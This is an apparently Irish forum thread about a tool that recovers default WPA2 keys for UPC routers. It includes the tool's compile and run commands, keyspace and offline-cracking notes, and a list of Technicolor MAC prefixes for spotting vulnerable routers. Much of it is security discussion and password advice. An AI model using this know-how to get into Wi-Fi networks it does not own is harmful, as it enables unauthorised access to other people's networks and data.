UPC router WPA2 key recovery

h57xiucj2z946q

Reminds me of the old eircom days!

http://haxx.in/upc_keys.c

Not known if this is limited to specific routers, but the link below are confirming working on some devices in Austria and Ireland:

http://reddit.com/r/netsec/comments/3z1672/upc_router_wpa2_pass_recovery_tool/

gctest50

although your world wonders me - you people i do not understand

GekkePrutser

I removed my rant about ISPs using generated WPA passwords (and ones with low complexity!)

But I'm not sure if this is ok to discuss here in detail.. I do think anyone using the factory default SSID and WPA key should change the WPA key ASAP...

syklops

GekkePrutser wrote: »

But I'm not sure if this is ok to discuss here in detail....

Why not?

Already compiled it. Now waiting for a UPC router to test.

GekkePrutser

syklops wrote: »

Why not?

I was just discussing the makeup of the UPC passwords in particular.. Not sure if that is OK/legal. Though if you run this tool or check the source code you will see the format quite clearly.

I was just pointing out that the format they use has a complexity of 23^8 which is not nearly enough to be considered safe from bruteforcing in my opinion (it's only 78 billion possible combinations). Even if this tool doesn't work - it didn't for me - it can be bruteforced in a few days with the right hardware anyway, and it has been possible to do this for years. I suppose there is no problem in pointing that out.

For a good level of security you need to have a random WPA password of at the very least 12 characters, with mixed uppercase/lowercase, digits and preferably some special characters too. At the moment with that you're talking years of "brute force" cracking time on a single PC with a good GPU (but remember computer hardware is getting exponentially faster too so in the future this won't be the case).

Common words, even long ones or combinations, as well as mobile numbers etc are an absolute no-no!

The WPA key generation algorithm is actually quite well made against brute force attacks as it uses a 2048-times hashing operation which increases bruteforce time a lot. In short, instead of one operation to try a single password you have to try thousands, compared to other algorithms. But using such a small keyspace like in this case undermines this when computers are so fast these days.

Anyway I'm not sure if specifying what format they use or if specifying what tools can be used is allowed here. I hinted at this so I removed it.

By the way @gctest50, I work in IT so knowing what is safe and what's not is part of my job. The knowing 'why' is not absolutely necessary for this but I find it helps understanding a lot. I like to know what I'm talking about. And I find the subject very interesting.

h57xiucj2z946q

GekkePrutser wrote: »

By the way @gctest50, I work in IT so knowing what is safe and what's not is part of my job. The knowing 'why' is not absolutely necessary for this but I find it helps understanding a lot. I like to know what I'm talking about. And I find the subject very interesting.

In that case, you'll know gctest50's post was in relation to the eircom WEP algorithm that was reverse engineered in 2007.

GekkePrutser

Fernando Squeaking Doe wrote: »

In that case, you'll know gctest50's post was in relation to the eircom WEP algorithm that was reverse engineered in 2007.

Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

I thought he thinks it's mad that people like talking about crypto I get that a lot.

syklops

GekkePrutser wrote: »

Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

I thought he thinks it's mad that people like talking about crypto I get that a lot.

It was a lyric from Jimi Hendrix' Third Stone from the Sun. That song was used in the Eircom cipher.

h57xiucj2z946q

GekkePrutser wrote: »

Ah no I didn't get this.. Yeah I knew about that but it was my understanding that it was fixed long ago.

I thought he thinks it's mad that people like talking about crypto I get that a lot.

See here: https://seeit.org/eircom/

beauf

Password should be something a complete PITA to use. Especially if using a Xbox controller.

GekkePrutser

Fernando Squeaking Doe wrote: »

See here: https://seeit.org/eircom/

Thanks!! That was very interesting. Reminds me of the Apple poem in OS X.

I wasn't in Ireland at that time so I hadn't followed it in detail.

Rgb.ie

Has any one tried this?

Have tested six UPC SSID's ( Cisco / Horizon ) none of the keys are correct.

syklops

Rgb.ie wrote: »

Has any one tried this?

Have tested six UPC SSID's ( Cisco / Horizon ) none of the keys are correct.

Did you try all 25 keys generated for each of the SSIDs?

Ive tried 1 SSID and 1 key with a friend as proxy and it didnt work.

Id love to test this in more detail. I could write a script which tests each key...

h57xiucj2z946q

That reddit link, the guy who posted the source reckons it is only working with the Thomson models.

I dumped the firmware of the Cisco EPC 2425 via JTAG and someone emailed me the 3925 firmware before. (Just hope I still have them, this was several years ago)

I loaded them up in IDA before but I didn't get too far and didn't spent too much time.

As eCos https://en.m.wikipedia.org/wiki/ECos is a single rom/executable, you won't see any system/library calls, as all that code is in same executable (almost like a statically compiled executable). Makes reverse engineering tough. To be honest, I should have made use of FLIRT signatures (http://blog.dutchcoders.io/enhancing-ida-disassembler-listings-with-flirt/)

Then you have to deal with MIPS. For me, this was relatively new. I am more experienced with ARM and x86.

Rgb.ie

syklops wrote: »

Did you try all 25 keys generated for each of the SSIDs?

Ive tried 1 SSID and 1 key with a friend as proxy and it didnt work.

Id love to test this in more detail. I could write a script which tests each key...

Sorry, I should of clarified.

I have ALL the correct keys ( 6 in total that I checked ) and tried the script - none of the passes were correct for any of the access points.

APs were a mix of cisco / Thomson

Khannie

GekkePrutser wrote: »

I removed my rant about ISPs using generated WPA passwords (and ones with low complexity!)

But I'm not sure if this is ok to discuss here in detail..

You discuss away there. Discussion of security holes, weaknesses and exploits are fair game here (subject to legal yada yada).

Shoutcast Ireland

How would i complie it?

gctest50

syklops wrote: »

It was a lyric from Jimi Hendrix' Third Stone from the Sun. That song was used in the Eircom cipher.

cos everyone knows if you double the speed of the song, invert the left channel and recombine to highlight the vocals you get this :

original speed i think :

http://www.dailymotion.com/video/x1j0un_third-stone-from-the-sun-by-jimi-he_music

syklops

Shoutcast Ireland wrote: »

How would i complie it?

Compilation instructions are in the source code.

BRB

Edit:

Make sure you have gcc / build-essentials installed. Then run:

gcc -fPIC -shared -I/usr/include/python2.7 -lcrypto upc_keys.c -o upc_keys.so && sudo cp upc_keys.so /usr/lib/python2.7/

hooplah

Shoutcast Ireland wrote: »

How would I complie it?

Do you have linux? If so go to the terminal, and in the directory you have downloaded the file to enter the following command:

[from the source code]

gcc -O2 -o upc_keys upc_keys.c -lcrypto

Now you can try ssids by entering

./upc_keys SSID

If you don't have gcc installed you will have to do so. If you have a mac you might be able to install gcc through homebrew - http://brew.sh/

If you only have a windows machine you'll need something like cygwin to compile url]https://www.cygwin.com/[/url.

Shoutcast Ireland

thanks for that,got it installed,tried two routers.no luck.

hooplah

Has anyone got it to work?

I tried it for my router here at home. None of the generated passwords match the one I use.
I have tried 5 or 6 of them but no luck.

h57xiucj2z946q

I looked at the EPC3925 and it has a 9 digit serial number. This keygen generates 8-digits serials for a given SSID. I generated the WPA2 keys for my 9-digit serial by tweaking the .c and as you can guess, incorrect key.

The reddit link in the OP shows that it works on some of the Technicolor routers. In some cases the generated serials were wrong also, but would generate the correct WPA2 key directly from the correct serial.

So looks like this isn't as interesting as it first seemed.

syklops

Fernando Squeaking Doe wrote: »

I looked at the EPC3925 and it has a 9 digit serial number. This keygen generates 8-digits serials for a given SSID. I generated the WPA2 keys for my 9-digit serial by tweaking the .c and as you can guess, incorrect key.

The reddit link in the OP shows that it works on some of the Technicolor routers. In some cases the generated serials were wrong also, but would generate the correct WPA2 key directly from the correct serial.

So looks like this isn't as interesting as it first seemed.

Is it just Technicolors or is it some Technicolors and some Cisco/Thomsons?

If its just Technicolors you can identify whether the AP is a a Technicolor or not by the first 6 digits of its BSSID:

FC94E3 Technicolor USA Inc.
FC528D Technicolor CH USA Inc.
E0885D Technicolor CH USA Inc
CC3540 Technicolor USA Inc.
CC03FA Technicolor CH USA
C4EA1D Technicolor
C42795 Technicolor USA Inc.
B0C287 Technicolor CH USA Inc
A4B1E9 Technicolor
9C9726 Technicolor
8C04FF Technicolor USA Inc.
88F7C7 Technicolor USA Inc.
80C6AB Technicolor USA Inc.
802994 Technicolor CH USA
589835 Technicolor
58238C Technicolor CH USA
4432C8 Technicolor USA Inc.
30918F Technicolor
28BE9B Technicolor USA Inc.
08952A Technicolor CH USA Inc

h57xiucj2z946q

Seems to be some and some!

You can see here here some people have commented on success to some degree: http://reddit.com/r/netsec/comments/3z1672/upc_router_wpa2_pass_recovery_tool/

Impetus

I have had my UPC router firmware updated automatically. Sometime after the update, I used my known, carefully set, router password and was denied entry.

The firmware update had wiped the password and made the user ID = return and the password = return key too.

It seems to me that they have little regard for customers' data security.

While I use wired Ethernet rather than WiFi (except for a mobile phone), their routers do not seem to support faster protocols such as 802.11 ac. This would make it somewhat slower for a determined 'neighbour' to crack the password.

GekkePrutser

Impetus wrote: »

While I use wired Ethernet rather than WiFi (except for a mobile phone), their routers do not seem to support faster protocols such as 802.11 ac. This would make it somewhat slower for a determined 'neighbour' to crack the password.

This is not really the case anymore. The network speed doesn't matter when cracking WPA2-PSK. All you need is one captured handshake and then you can bruteforce it offline. What does matter is the complexity and length of the password (which for UPC's default passwords is not very good).

A couple of years ago the "Reaver" WPS attack came out and with that attack the network speed did actually matter because it was an active online attack. However it could be easily mitigated by turning WPS off and these days routers automatically block WPS if a wrong password is tried several times within an X amount of time, making it pretty useless. I don't think it works on UPC's routers anymore.

It also matters for attacking WEP but I don't think there are any 802.11ac routers that do WEP anyway WEP is so broken you might as well use no encryption.

Impetus

GekkePrutser wrote: »

What does matter is the complexity and length of the password (which for UPC's default passwords is not very good).

Especially when a firmware update changes the default (or user-selected) password to zero characters (which also applies to user ID).

I am thinking that it may be a 'feature' of the Cisco platform for updating firmware used by their ISP clients - because I have noticed it on Cisco modems in more than one country.

h57xiucj2z946q

Ubee now: https://deadcode.me/blog/2016/07/01/UPC-UBEE-EVW3226-WPA2-Reversing.html

Shoutcast Ireland

Fernando Squeaking Doe wrote: »

Ubee now: https://deadcode.me/blog/2016/07/01/UPC-UBEE-EVW3226-WPA2-Reversing.html

It works on my router